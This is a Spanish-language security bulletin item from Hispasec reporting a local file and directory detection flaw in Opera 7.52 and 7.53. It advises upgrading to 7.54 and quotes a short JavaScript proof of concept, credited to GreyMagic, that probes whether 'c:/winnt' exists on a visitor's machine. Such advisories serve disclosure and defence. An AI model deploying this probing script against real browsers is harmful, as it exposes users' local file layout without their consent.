Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Usted está aquí: Inicio / Vulnerabilidades / Revelación de información sensible en Opera 7.52 y 7.53

Revelación de información sensible en Opera 7.52 y 7.53

Por Deja un comentario

Se ha descubierto una vulnerabilidad en algunas versiones del popular
navegador Opera que podría ser explotada por un usuario remoto para
adquirir información sensible de un sistema remoto.

Cuando se asigna a un iframe un archivo o directorio que no existe,
este navegador generará un error. Un usuario remoto puede crear código
HTML que carga un iframe y cambia la URL de dicho recurso a un archivo
o directorio local, y entonces se detecta si hay ese error para
determinar si ese elemento existe.

Se recomienda actualizar a la versión 7.54, disponible en la siguiente
dirección:
http://www.opera.com/download/

Como ejemplo el siguiente código extraído de la web de GreyMagic, nos
permite saber si la carpeta «winnt» existe en la máquina de la víctima.

«http://blank.html

onload=function () {
var sLocal=»c:/winnt»;
frames[0].location.href=sLocal;
setTimeout(
function () {
try {
frames[0].document;
alert(sLocal+» does not exists.»);
} catch (oErr) {
alert(sLocal+» exists.»);
}
},
250
);
}
«

Antonio Román
roman@hispasec.com

Más información:

Opera Local File/Directory Detection.
http://www.greymagic.com/security/advisories/gm009-op/

Opera Local File IFRAME Error Response Lets Remote Users Determine if Files
or Directories Exist
http://www.securitytracker.com/alerts/2004/Aug/1010966.html

Acerca de Hispasec

Hispasec Ha escrito 6965 publicaciones.

Interacciones con los lectores

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.